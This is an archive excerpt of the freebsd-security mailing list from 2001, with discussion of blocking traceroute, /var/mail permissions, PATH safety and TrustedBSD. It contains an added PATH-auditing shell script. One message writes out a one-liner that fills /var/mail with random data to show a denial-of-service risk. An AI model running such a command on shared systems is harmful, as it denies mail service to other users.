> but has the added benefit that it protects against a user filling /var/mail
> inadvertently as they would have to purposely send lots of e-mail.
>
> Which do most of you use? Is there a reason /var/mail is initially set to
> 775 rather than 1777?
>
> Thanks,
>
> Leonard
>
>
> --
> Leonard Chung -
> SETI@home - The Search for Extraterrestrial Intelligence @ home
> http://www.setiathome.ssl.berkeley.edu

From owner-freebsd-security Sun Jun 24 22:29:42 2001
Delivered-To: freebsd-security@freebsd.org
Received: from db.nexgen.com (db.nexgen.com [64.81.208.78]) by hub.freebsd.org (Postfix) with SMTP id E854037B405 for ; Sun, 24 Jun 2001 22:29:37 -0700 (PDT) (envelope-from ml@db.nexgen.com)
Received: (qmail 9938 invoked from network); 25 Jun 2001 05:30:22 -0000
Received: from localhost.nexgen.com (HELO alexus) (root@127.0.0.1) by localhost.nexgen.com with SMTP; 25 Jun 2001 05:30:22 -0000
Message-ID: <006101c0fd37$f93f7cd0$0100a8c0@alexus>
From: "alexus"
To: "Simon Rakovec" ,
References: <006a01c0fb6b$2d64d830$9865fea9@book> <3B36267B.5B5FDBE@inforta.com>
Subject: Re: disable traceroute to my host
Date: Mon, 25 Jun 2001 01:30:39 -0400
MIME-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2462.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2462.0000

where did you get those numbers?

----- Original Message -----
From: "Simon Rakovec"
To:
Sent: Sunday, June 24, 2001 1:42 PM
Subject: Re: disable traceroute to my host

> Try this:
>
> ipfw add deny udp from any 32769-65535 to 33434-33523
>
> Regards, Simon
>
> alexus wrote:
> >
> > is it possible to disable using ipfw so people won't be able to traceroute
> > me?

From owner-freebsd-security Sun Jun 24 22:31:35 2001
Delivered-To: freebsd-security@freebsd.org
Received: from mail.tgd.net (rand.tgd.net [64.81.67.117]) by hub.freebsd.org (Postfix) with SMTP id 328D837B401 for ; Sun, 24 Jun 2001 22:31:30 -0700 (PDT) (envelope-from sean@mailhost.tgd.net)
Received: (qmail 64012 invoked by uid 1001); 25 Jun 2001 05:31:23 -0000
Date: Sun, 24 Jun 2001 22:31:23 -0700
From: sean-freebsd-security@chittenden.org
To: alexus
Cc: freebsd-security@freebsd.org
Subject: Re: disable traceroute to my host
Message-ID: <20010624223123.B44590@rand.tgd.net>
References: <006a01c0fb6b$2d64d830$9865fea9@book> <3B36267B.5B5FDBE@inforta.com> <006101c0fd37$f93f7cd0$0100a8c0@alexus>
Mime-Version: 1.0
Content-Disposition: inline
In-Reply-To: <006101c0fd37$f93f7cd0$0100a8c0@alexus>; from "ml@db.nexgen.com" on Mon, Jun 25, 2001 at 01:30:39AM
X-PGP-Key: 0x1EDDFAAD
X-PGP-Fingerprint: C665 A17F 9A56 286C 5CFB 1DEA 9F4F 5CEF 1EDD FAAD
X-Web-Homepage: http://sean.chittenden.org/

man traceroute

[snip]

     -p   Protocol specific. For UDP and TCP, sets the base port number
          used in probes (default is 33434). Traceroute hopes that
          nothing is listening on UDP ports base to base + nhops - 1 at
          the destination host (so an ICMP PORT_UNREACHABLE message will
          be returned to terminate the route tracing). If something is
          listening on a port in the default range, this option can be
          used to pick an unused port range.

-sc

On Mon, Jun 25, 2001 at 01:30:39AM -0400, alexus wrote:
> Delivered-To: chittenden.org-sean-freebsd-security@chittenden.org
> Delivered-To: freebsd-security@freebsd.org
> From: "alexus"
> To: "Simon Rakovec" ,
>
> Subject: Re: disable traceroute to my host
> Date: Mon, 25 Jun 2001 01:30:39 -0400
> X-Priority: 3
> X-MSMail-Priority: Normal
> X-Mailer: Microsoft Outlook Express 6.00.2462.0000
> X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2462.0000
>
> where did you get those numbers?
>
> ----- Original Message -----
> From: "Simon Rakovec"
> To:
> Sent: Sunday, June 24, 2001 1:42 PM
> Subject: Re: disable traceroute to my host
>
>
> > Try this:
> >
> > ipfw add deny udp from any 32769-65535 to 33434-33523
> >
> > Regards, Simon
> >
> > alexus wrote:
> > >
> > > is it possible to disable using ipfw so people won't be able to
> traceroute
> > > me?
>
>

--
Sean Chittenden

From owner-freebsd-security Sun Jun 24 23: 3:19 2001
Delivered-To: freebsd-security@freebsd.org
Received: from flood.ping.uio.no (flood.ping.uio.no [129.240.78.31]) by hub.freebsd.org (Postfix) with ESMTP id EA1FE37B401; Sun, 24 Jun 2001 23:03:12 -0700 (PDT) (envelope-from des@ofug.org)
Received: (from des@localhost) by flood.ping.uio.no (8.9.3/8.9.3) id IAA85599; Mon, 25 Jun 2001 08:03:07 +0200 (CEST) (envelope-from des@ofug.org)
X-URL: http://www.ofug.org/~des/
X-Disclaimer: The views expressed in this message do not necessarily coincide with those of any organisation or company with which I am or have been affiliated.
To: Soren Kristensen
Cc: "Karsten W. Rohrbach" , hackers@FreeBSD.ORG, freebsd-security@FreeBSD.ORG
Subject: Re: Status of encryption hardware support in FreeBSD
References: <3B33A891.EC712701@soekris.com> <20010624181007.C52432@mail.webmonster.de> <20010624183147.F52432@mail.webmonster.de> <20010624201456.A57877@mail.webmonster.de> <3B363713.2849219@soekris.com>
From: Dag-Erling Smorgrav
Date: 25 Jun 2001 08:03:07 +0200
In-Reply-To: <3B363713.2849219@soekris.com>
Message-ID:
Lines: 10
User-Agent: Gnus/5.0808 (Gnus v5.8.8) Emacs/20.7
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii

Soren Kristensen writes:
> SSL is for secure web access, and the main need is for Public Key
> generation. This doesn't really have anything to do with the IP stack.
> Afaik, OpenSSL is more like an extension to the web server software.

Try 'man openssl', or just 'openssl -help'. You'll be surprised...

DES
--
Dag-Erling Smorgrav - des@ofug.org

From owner-freebsd-security Sun Jun 24 23:31:11 2001
Delivered-To: freebsd-security@freebsd.org
Received: from albatross.prod.itd.earthlink.net (albatross.mail.pas.earthlink.net [207.217.120.120]) by hub.freebsd.org (Postfix) with ESMTP id 4E7D837B401 for ; Sun, 24 Jun 2001 23:31:09 -0700 (PDT) (envelope-from cjc@earthlink.net)
Received: from blossom.cjclark.org (dialup-209.247.139.131.Dial1.SanJose1.Level3.net [209.247.139.131]) by albatross.prod.itd.earthlink.net (EL-8_9_3_3/8.9.3) with ESMTP id XAA17320; Sun, 24 Jun 2001 23:30:39 -0700 (PDT)
Received: (from cjc@localhost) by blossom.cjclark.org (8.11.4/8.11.3) id f5P6VsB18347; Sun, 24 Jun 2001 23:31:54 -0700 (PDT) (envelope-from cjc)
Date: Sun, 24 Jun 2001 23:31:54 -0700
From: "Crist J. Clark"
To: faSty
Cc: Leonard Chung , freebsd-security@FreeBSD.ORG
Subject: Re: "Correct" permissions on /var/mail?
Message-ID: <20010624233154.N11961@blossom.cjclark.org>
Reply-To: cjclark@alum.mit.edu
References: <5.1.0.14.2.20010624140225.02d492f0@chung.yikes.com> <20010624141322.A77852@i-sphere.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: <20010624141322.A77852@i-sphere.com>; from fasty@i-sphere.com on Sun, Jun 24, 2001 at 02:13:22PM -0700

On Sun, Jun 24, 2001 at 02:13:22PM -0700, faSty wrote:
> Yes, the FreeBSD default is 775 on /var/mail, but my email server kept
> complaining that /var/mail is a potential security problem, so I had to
> set 1777 to shut the email server up. It seems safe; no security exploit
> lately on my shell server with 20 hardcore shell customers.
>
> PS. This is going to be an interesting topic to discuss.. I'm forwarding
> to hear other people's opinions.

I'm not. Devolves into a religious war. I just had to sit through one of
these on another mailing list. If you want to see some opinions on this
go to this link,

  http://www.securityfocus.com/archive/1/184210

And follow the thread it started (click "Thread Index" at the top of the
frame and look for the side threads it started too, "Mail delivery
privileges"). No need to start this here.
--
Crist J. Clark                                cjclark@alum.mit.edu

From owner-freebsd-security Sun Jun 24 23:39:32 2001
Delivered-To: freebsd-security@freebsd.org
Received: from ringworld.nanolink.com (ringworld.nanolink.com [195.24.48.13]) by hub.freebsd.org (Postfix) with SMTP id 6808E37B401 for ; Sun, 24 Jun 2001 23:39:18 -0700 (PDT) (envelope-from roam@orbitel.bg)
Received: (qmail 7865 invoked by uid 1000); 25 Jun 2001 06:37:31 -0000
Date: Mon, 25 Jun 2001 09:37:31 +0300
From: Peter Pentchev
To: Simon Rakovec
Cc: freebsd-security@freebsd.org
Subject: Re: disable traceroute to my host
Message-ID: <20010625093731.A934@ringworld.oblivion.bg>
Mail-Followup-To: Simon Rakovec , freebsd-security@freebsd.org
References: <006a01c0fb6b$2d64d830$9865fea9@book> <3B36267B.5B5FDBE@inforta.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: <3B36267B.5B5FDBE@inforta.com>; from simon@inforta.com on Sun, Jun 24, 2001 at 07:42:19PM +0200

On Sun, Jun 24, 2001 at 07:42:19PM +0200, Simon Rakovec wrote:
> Try this:
>
> ipfw add deny udp from any 32769-65535 to 33434-33523

As Karsten noted in a followup, this is not proper network practice.
There might be a LOT of things listening on those UDP ports, including
ephemeral outgoing UDP connections.

As many other people noted, this does not stop Windows traceroute,
which goes via ICMP.

As the traceroute(8) manpage notes, this does not stop people who know
how to use the traceroute '-p port' option to select a starting port
!= 32768.

As Dag-Erling Smorgrav noted, in general it is impossible to disable
a person determined to traceroute you, and in practice, there is no
need to.

G'luck,
Peter

PS.
How was that now... one source: plagiarism, two sources: comparative study, three sources: an academic thesis.. I did even better than that! ;) -- Thit sentence is not self-referential because "thit" is not a word. > alexus wrote: > > > > is it possible to disable using ipfw so people won't be able to traceroute > > me? > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Jun 24 23:58:19 2001 Delivered-To: freebsd-security@freebsd.org Received: from mta04.onebox.com (mta04.onebox.com [64.68.77.147]) by hub.freebsd.org (Postfix) with ESMTP id AEC4A37B437 for ; Sun, 24 Jun 2001 23:58:08 -0700 (PDT) (envelope-from ohshutup@zdnetmail.com) Received: from onebox.com ([10.1.101.9]) by mta04.onebox.com (InterMail vM.4.01.03.21 201-229-121-121-20010307) with SMTP id <20010625065808.HDO26282.mta04.onebox.com@onebox.com>; Sun, 24 Jun 2001 23:58:08 -0700 Received: from [24.176.48.110] by onebox.com with HTTP; Sun, 24 Jun 2001 23:58:08 -0700 Date: Sun, 24 Jun 2001 23:58:08 -0700 Subject: Re: IPF rule response [should be IPFW rule response instead] Reply-To: ohshutup@zdnetonebox.com From: "Kris Anderson" To: "Karsten W. Rohrbach" Cc: freebsd-security@FreeBSD.ORG Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit MIME-Version: 1.0 Message-Id: <20010625065808.HDO26282.mta04.onebox.com@onebox.com> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Oops, you are right. I am. doh... But none the less what is the 195. network trying to do with my system? I didn't initiate any requests from/to that system. 
Kris Anderson(ohshutup@zdnetmail.com)@2001.06.22 15:03:12 +0000:
> Howdy folks,
>
> I've got a rule in my ipf that is reporting the following to syslog
>
> : <2>Jun 22 14:51:34 /kernel: ipfw: 3 Deny TCP 195.224.212.72:21
> :21 in via rl0
>
> I have limited understanding but it looks like that some bonehead on
> the 195. network is doing some sort of goofy ftp thing to my public_if,
> almost as if it was ftp relaying.
>
> Could somebody unconfuse me as to what this means?
>
> it seems that you are mixing up ipf (ipfilter) and ipfw in the first
> place. a properly configured ipfilter with ftp in-core proxy for
> keeping state on the sessions would solve it i think.
> /k
> -- 
> "In Christianity neither morality nor religion come into contact with
> reality at any point." --Friedrich Nietzsche
> KR433/KR11-RIPE -- WebMonster Community Founder -- nGENn GmbH SeniorTechie
> http://www.webmonster.de/ -- ftp://ftp.webmonster.de/ -- http://www.ngenn.net/
> karsten&rohrbach.de -- alpha&ngenn.net -- alpha&scene.org -- catch@spam.de
> GnuPG 0x2964BF46 2001-03-15 42F9 9FFF 50D4 2F38 DBEE DF22 3340 4F4E 2964 BF46
> Please do not remove my address from To: and Cc: fields in mailing lists. 10x

From owner-freebsd-security Mon Jun 25 0:00:36 2001
From: Enriko Groen
To:
'alexus', freebsd-security@FreeBSD.ORG, freebsd-isp@freebsd.org
Date: Mon, 25 Jun 2001 09:00:18 +0200
Subject: RE: disable traceroute to my host

> -----Original Message-----
> From: alexus [mailto:ml@db.nexgen.com]
>
> is it possible to disable using ipfw so people won't be able
> to traceroute
> me?

You could with IPfilter which has a fastroute option which will not lower the hopcount. However I think this will only work if you use this feature on a firewall.

-- 
Enriko Groen, Hosting manager
netivity bv - www.netivity.nl - enriko.groen@netivity.nl - 038 - 850 1000
van nagellstraat 4, 8011 eb zwolle

From owner-freebsd-security Mon Jun 25 1:29:22 2001
From: Leon Breedt
To: Ted Mittelstaedt
Cc: freebsd-security@FreeBSD.ORG
Date: Mon, 25 Jun 2001 10:29:18 +0200
Subject: Re: Kernel Panic
On Sun, Jun 24, 2001 at 02:01:34AM -0700, Ted Mittelstaedt wrote:
> That would be impossible unless you had "." in your path. If
> you did (which is a very BAD thing) then yes your script probably
> loaded itself (assuming you named it "pine). This is why the
> system defaults to NOT having "." in the path.

I'm not sure if everyone's aware of this (I wasn't), but an empty colon in your PATH is an implicit . (!!)

i.e.

PATH=/bin:/usr/bin:/usr/local/bin:

In sh(1):

     2. The shell searches each entry in PATH in turn for the command.
        The value of the PATH variable should be a series of entries
        separated by colons. Each entry consists of a directory name.
        The current directory may be indicated implicitly by an empty
        directory name, or explicitly by a single period.

Regards,
Leon.

-- 
lj breedt
coder

"Threads are for people who can't program state machines."
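Leon's point is easy to check mechanically, and the trailing-colon case is the one that IFS-based splitting silently hides. The following is an added example written for this thread, not code from FreeBSD or from anyone posting here: a POSIX sh function that walks a PATH value entry by entry and flags the three ways an entry can mean "look in the current directory" (a literal `.`, an empty entry from a leading, trailing or doubled colon, and any other relative name), plus a companion that rebuilds the PATH without them. The function names `audit_path` and `clean_path` are my own.

```shell
#!/bin/sh
# Audit a PATH value for entries that make the shell search the current
# directory.  Added example for this thread, not FreeBSD code; the
# function names audit_path and clean_path are assumptions of the example.
#
# sh(1) searches PATH entries in order, and an *empty* entry (a leading,
# trailing or doubled colon) means "." exactly as a literal "." does, so
# PATH=/bin:/usr/bin:/usr/local/bin: ends in an implicit current directory.

# audit_path PATHVALUE -> prints one "unsafe:" line per offending entry;
# returns 1 if any were found, 0 if PATHVALUE holds only absolute dirs.
audit_path() {
    bad=0
    # Walk the string by hand: IFS splitting would drop the empty field
    # produced by a trailing colon, which is exactly the one we care about.
    rest="$1:"
    while [ -n "$rest" ]; do
        entry=${rest%%:*}        # text up to the first colon
        rest=${rest#*:}          # everything after it
        case "$entry" in
            "")  echo "unsafe: empty entry (implicit current directory)"; bad=1 ;;
            .)   echo "unsafe: explicit ."; bad=1 ;;
            /*)  ;;              # absolute directory: fine
            *)   echo "unsafe: relative entry '$entry'"; bad=1 ;;
        esac
    done
    return $bad
}

# clean_path PATHVALUE -> prints PATHVALUE with every unsafe entry removed,
# keeping the absolute directories in their original order.
clean_path() {
    out=""
    rest="$1:"
    while [ -n "$rest" ]; do
        entry=${rest%%:*}
        rest=${rest#*:}
        case "$entry" in
            /*) out="${out:+$out:}$entry" ;;
            *)  ;;               # "", "." and relative names are dropped
        esac
    done
    printf '%s\n' "$out"
}

# Check the PATH of the shell running this script and suggest a clean one.
if audit_path "$PATH"; then
    echo "PATH is clean: $PATH"
else
    echo "suggested PATH: $(clean_path "$PATH")"
fi
```

Run it from a login shell to see whether the dotfiles on a box have picked up a stray colon; the check on `"$PATH"` at the bottom reports on the invoking shell's own value.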
From owner-freebsd-security Mon Jun 25 6:49:11 2001
From: yome@m6net.fr
To: freebsd-security@freebsd.org
Date: Mon, 25 Jun 2001 15:48:32 +0200 (CEST)

------------------------
Win up to 3 million francs by playing the JEU DE LA BOURSE at http://www.jeudelabourse.com

From owner-freebsd-security Mon Jun 25 7:14:09 2001
From: Robert Watson
To: freebsd-security@FreeBSD.org
Date: Mon, 25 Jun 2001 10:13:46 -0400 (EDT)
Subject: Reminder: TrustedBSD paper at USENIX Technical Conference, FREENIX track (fwd)
For those attending USENIX and interested in the TrustedBSD work, I'll be presenting a paper at the FREENIX track later this week. Some more details below; please see the USENIX conference schedule for time/location details.

Robert N M Watson             FreeBSD Core Team, TrustedBSD Project
robert@fledge.watson.org      NAI Labs, Safeport Network Services

---------- Forwarded message ----------
Date: Mon, 25 Jun 2001 10:12:35 -0400 (EDT)
From: Robert Watson
To: trustedbsd-discuss@TrustedBSD.org
Subject: Reminder: TrustedBSD paper at USENIX Technical Conference, FREENIX track

This week the USENIX Annual Technical Conference is being held in Boston, MA--I'll be presenting a paper as part of its FREENIX track on the topic of some of the on-going TrustedBSD work, including EAs, ACLs, and initial work on MAC. The title and abstract of the paper are below; if you'll be at USENIX, I look forward to seeing you at that session, and welcome any questions or comments.

TrustedBSD: Adding Trusted Operating System Features to FreeBSD

Abstract

Trusted operating systems provide a ``next level'' of system security, offering both new security features and higher assurance that they are properly implemented. TrustedBSD is an on-going project to integrate a number of trusted OS features into the open source FreeBSD operating system, and involves both architectural and development process improvements. This paper describes how the open source development practices of the FreeBSD Project impacted the design and implementation choices for these features, and describes lessons learned that will influence future work. Several key TrustedBSD features are discussed as examples of how new security services may be introduced in such an environment.
Robert N M Watson             FreeBSD Core Team, TrustedBSD Project
robert@fledge.watson.org      NAI Labs, Safeport Network Services

From owner-freebsd-security Mon Jun 25 9:59:07 2001
From: Jason DiCioccio
To: 'Leonard Chung', security@FreeBSD.ORG
Date: Mon, 25 Jun 2001 09:58:51 -0700
Subject: RE: "Correct" permissions on /var/mail?

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

I use the freebsd default, although someone could still fill up /var if they wanted to.. (cat /dev/urandom >/var/mail/`whoami`) But 1777 they could create extra files, no? I'd rather not have a second /tmp..

Cheers,
- -JD-

- -----Original Message-----
From: Leonard Chung [mailto:leonard@ssl.berkeley.edu]
Sent: Sunday, June 24, 2001 2:12 PM
To: security@FreeBSD.ORG
Subject: "Correct" permissions on /var/mail?

I was having a debate with a colleague the other day on the correct mode for /var/mail. He claimed that 1777 is more secure than what I've always had (the FreeBSD default of root:mail 775).
1777 gives you the additional benefit of protecting you from compromises on the mail group, but requires that on every machine quotas be installed even for machines with just one or two users. Without quotas, a malicious user could fill up /var/mail creating a DoS for everybody receiving mail off that machine. 775 doesn't protect against compromises of the mail group, but has the added benefit that it protects against a user filling /var/mail inadvertently as they would have to purposely send lots of e-mail.

Which do most of you use? Is there a reason /var/mail is initially set to 775 rather than 1777?

Thanks,
Leonard

- -- 
Leonard Chung - SETI@home - The Search for Extraterrestrial Intelligence @ home
http://www.setiathome.ssl.berkeley.edu

-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 7.0.3 for non-commercial use

iQA/AwUBOzdupVCmU62pemyaEQK3RwCgzkfVW04EYczOaPU7bJrNb1RQM2wAn0tI
VBfsNr+Jg1j6n+S40M4QXRMA
=RbAH
-----END PGP SIGNATURE-----

From owner-freebsd-security Mon Jun 25 12:21:40 2001
From: "alexus"
Date: Mon, 25 Jun 2001 15:21:49 -0400
Subject: Re: disable traceroute to my host
the thing is that windows based machines are using icmp for traceroute and unix uses udp.. what i'd like to know is: which type of icmp is used for traceroute? (for example by denying incoming icmp of icmptype 8 i was able to deny any pinging of my box from outside *BUT* i can ping everyone myself from my box)

also i'd like to know which standard range of udp ports unix's traceroute uses?

----- Original Message -----
From: "Kris Anderson"
Sent: Friday, June 22, 2001 7:02 PM
Subject: Re: disable traceroute to my host

> You can put in a rule like
>
> ipfw add 3 deny icmp from any to FF.FF.FF.FF via F0
>
> change FF.FF.FF.FF to the ip address of your outside ip address
> change F0 to the interface name of said outside interface
>
> now I don't know about directly blocking traceroutes only but traceroute
> does an icmp thing somewhat like ping.
>
> Problem is that this will stop all ICMP from coming into the interface
> from the outside, even ICMP responses.
>
> For example, you can traceroute out, but traceroute responses now get
> blocked (This includes anything that uses ICMP) does not get back in
> because it is being blocked by the above rule. Think of it as one way
> mirror.
>
> Now, if anybody knows of a more subtle way to allow ICMP out and back
> in, but keep any externals from coming in I certainly am one who would
> like to know.
> --
> Kris Anderson
> ohshutup@zdnetonebox.com - email
> (408) 514-2611 ext. 1178 - voicemail/fax
>
>
> ---- "alexus" wrote:
> > is it possible to disable using ipfw so people won't be able to traceroute
> > me?
From owner-freebsd-security Mon Jun 25 12:22:45 2001
From: "alexus"
To: "Brooks Davis"
Date: Mon, 25 Jun 2001 15:22:54 -0400
Subject: Re: disable traceroute to my host

i understand that i only will be able to "hide" my last hop for everyone and not every others;)

----- Original Message -----
From: "Brooks Davis"
To: "alexus"
Sent: Friday, June 22, 2001 7:04 PM
Subject: Re: disable traceroute to my
host

From owner-freebsd-security Mon Jun 25 12:30:31 2001
From: Dag-Erling Smorgrav
To: "alexus"
Date: 25 Jun 2001 21:30:20 +0200
Subject: Re: disable traceroute to my host

"alexus" writes:
> which type of icmp uses for traceroute? (for example by deny icmp for
> incoming icmptype 8 i was able to deny any pinging of my box from outside
> *BUT* i can ping everyone myself from my box)

Don't bother, just block all incoming packets with a ttl of 1.
DES
-- 
Dag-Erling Smorgrav - des@ofug.org

From owner-freebsd-security Mon Jun 25 12:31:58 2001
From: "alexus"
To: "Dag-Erling Smorgrav"
Date: Mon, 25 Jun 2001 15:32:06 -0400
Subject: Re: disable traceroute to my host

that's what i wanted to do at first place!:)

i didn't know if its possible.. is it?

----- Original Message -----
From: "Dag-Erling Smorgrav"
To: "alexus"
Sent: Monday, June 25, 2001 3:30 PM
Subject: Re: disable traceroute to my host

> "alexus" writes:
> > which type of icmp uses for traceroute? (for example by deny icmp for
> > incoming icmptype 8 i was able to deny any pinging of my box from outside
> > *BUT* i can ping everyone myself from my box)
>
> Don't bother, just block all incoming packets with a ttl of 1.
>
> DES
> --
> Dag-Erling Smorgrav - des@ofug.org

From owner-freebsd-security Mon Jun 25 12:32:35 2001
From: "alexus"
To: "valence"
Date: Mon, 25 Jun 2001 15:32:43 -0400
Subject: Re: disable traceroute to my host

thank you i'll take a look at that

----- Original Message -----
From: "valence"
To: "alexus"
Sent: Saturday, June 23, 2001 1:20 PM
Subject: Re: disable traceroute to my host

http://www.lovric.net/antiroute

On Fri, 22 Jun 2001, alexus wrote:
> is it possible to disable using ipfw so people won't be able to traceroute
> me?
>
>

From owner-freebsd-security Mon Jun 25 12:34:26 2001
From: Dag-Erling Smorgrav
To: "alexus"
Date: 25 Jun 2001 21:34:16 +0200
Subject: Re: disable traceroute to my host

"alexus" writes:
> that's what i wanted to do at first place!:)
>
> i didn't know if its possible.. is it?

We write man pages for a reason.
DES
-- 
Dag-Erling Smorgrav - des@ofug.org

From owner-freebsd-security Mon Jun 25 12:39:26 2001
From: Nate Williams
To: "Karsten W. Rohrbach"
Cc: Dag-Erling Smorgrav, freebsd-security@FreeBSD.ORG
Date: Mon, 25 Jun 2001 13:39:05 -0600 (MDT)
Subject: Re: disable traceroute to my host

> hehe, reminds me of this customer's nokia ip-330 sitting in the corner
> of my lab -- i probably will wipe ipso and this weird-ass checkpoint
> fw1, replace it with freebsd and ipfilter :->

Except you'd be replacing the ip-330 running FreeBSD with another box running FreeBSD.
Nate (or Nate.Williams@nokia.com ;)

From owner-freebsd-security Mon Jun 25 12:39:36 2001
From: "alexus"
To: "Fernando Gleiser"
Date: Mon, 25 Jun 2001 15:39:44 -0400
Subject: Re: disable traceroute to my host

only for incoming? or for outgoing as well?

----- Original Message -----
From: "Fernando Gleiser"
To: "alexus"
Sent: Friday, June 22, 2001 9:23 PM
Subject: Re: disable traceroute to my host

> On Fri, 22 Jun 2001, alexus wrote:
>
> > is it possible to disable using ipfw so people won't be able to traceroute
> > me?
>
> I don't know if it is possible with ipfw, but with ip filter you can add
> a rule to block any packets with ttl=1:
>
> block in log quick on xl0 ttl 1 proto ip all
>
> That will stop windows traceroute (icmp based) as well as unix traceroute
> (udp based).
>
> Unix traceroute uses udp packets with destination port > 33434, but this can
> be changed.
> As far as I know, the only way to stop traceroute is to drop
> any packet with ttl=1. This might block legitimate traffic, but I haven't
> seen any packet in the wild with ttl=1 which was not a traceroute.
>
>
> Hope this helps.
> Fer

From owner-freebsd-security Mon Jun 25 12:40:14 2001
From: "alexus"
To: "Dag-Erling Smorgrav"
Date: Mon, 25 Jun 2001 15:40:23 -0400
Subject: Re: disable traceroute to my host

i'm reading them as we speak..
thanks for your help:)

----- Original Message -----
From: "Dag-Erling Smorgrav"
To: "alexus"
Sent: Monday, June 25, 2001 3:34 PM
Subject: Re: disable traceroute to my host

> "alexus" writes:
> > that's what i wanted to do at first place!:)
> >
> > i didn't know if its possible.. is it?
>
> We write man pages for a reason.
>
> DES
> --
> Dag-Erling Smorgrav - des@ofug.org

From owner-freebsd-security Mon Jun 25 12:47:59 2001
From: "alexus"
To: "Karsten W. Rohrbach", "Dag-Erling Smorgrav"
Date: Mon, 25 Jun 2001 15:48:09 -0400
Subject: Re: disable traceroute to my host

heh.. so what's RFC on that? and when are you coming over?

----- Original Message -----
From: "Karsten W.
Rohrbach"
To: "Dag-Erling Smorgrav"
Sent: Sunday, June 24, 2001 12:16 PM
Subject: Re: disable traceroute to my host

From owner-freebsd-security Mon Jun 25 12:48:34 2001
From: "alexus"
To: "Karsten W. Rohrbach", "Simon Rakovec"
Date: Mon, 25 Jun 2001 15:48:44 -0400
Subject: Re: disable traceroute to my host

i agree shutdown now is best choice:)

----- Original Message -----
From: "Karsten W.
Rohrbach" To: "Simon Rakovec" Cc: Sent: Sunday, June 24, 2001 2:34 PM Subject: Re: disable traceroute to my host To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jun 25 12:49:17 2001 Delivered-To: freebsd-security@freebsd.org Received: from db.nexgen.com (db.nexgen.com [64.81.208.78]) by hub.freebsd.org (Postfix) with SMTP id 3D66337B405 for ; Mon, 25 Jun 2001 12:49:12 -0700 (PDT) (envelope-from ml@db.nexgen.com) Received: (qmail 14093 invoked from network); 25 Jun 2001 19:50:00 -0000 Received: from localhost.nexgen.com (HELO book) (root@127.0.0.1) by localhost.nexgen.com with SMTP; 25 Jun 2001 19:50:00 -0000 Message-ID: <016a01c0fdaf$f0aeb720$9865fea9@book> From: "alexus" To: , "Dag-Erling Smorgrav" References: <20010622230217.JKT10107.mta05.onebox.com@onebox.com> Subject: Re: disable traceroute to my host Date: Mon, 25 Jun 2001 15:49:26 -0400 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4522.1200 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org i'm thinkin to disable ttl=1 .. would that be ok with you? ----- Original Message ----- From: "Dag-Erling Smorgrav" To: Sent: Sunday, June 24, 2001 11:10 AM Subject: Re: disable traceroute to my host > "Kris Anderson" writes: > > You can put in a rule like > > > > ipfw add 3 deny icmp from any to FF.FF.FF.FF via F0 > > [...] > > AUUUUGH! > > First - the only one who got it right is Brooks Davis: no, it can't be > done. 
The best you can hope for is to prevent your own box (and > anything behind it, if it's a gateway) from responding to certain > specific types of traces, but the tracer will still be able to see > most of the route between you and him, and there are ways of tracing a > route that you can't block without also blocking a lot of legitimate > traffic. > > Second - traceroute is pretty harmless, and not really the corner- > stone of 3v1l h4ckd0m you people seem to think it is, so even if you > could prevent anyone from tracerouting you it wouldn't make much (or > even any) difference to an attacker's ability to harm you. > > Third - if you set up ipfw to unconditionally block ICMP (whether in > the mistaken belief that it will prevent route tracing or for some > other lameass reason), I will personally buy a very heavy baseball > bat, hop on a plane, and pay you a visit you'll remember for the rest > of your very short lives. Although some ICMP types are admittedly not > very useful, that doesn't mean none of them are, and you should at the > very least let types 3 and 11 through or you'll be very sorry. I > usually set up my filters to let 0, 3, 8 and 11 through and block > everything else. > > Fourth - this subject has been discussed to death on this very list > several times in the past. We keep searchable archives for a reason. > > Fifth - someone mentioned stealth routing. There's no such thing in > FreeBSD, but there's something called stealth forwarding, which I > wrote*, and which makes the TCP/IP stack neither decrement nor even > inspect the TTL on forwarded packets, so if someone traceroutes a host > behind you you won't show up in the trace, but if someone traceroutes > you it'll be business as usual. You need to add the IPSTEALTH option > to your kernel to enable support for this (and toggle a sysctl > variable to actually turn stealth forwarding on). 
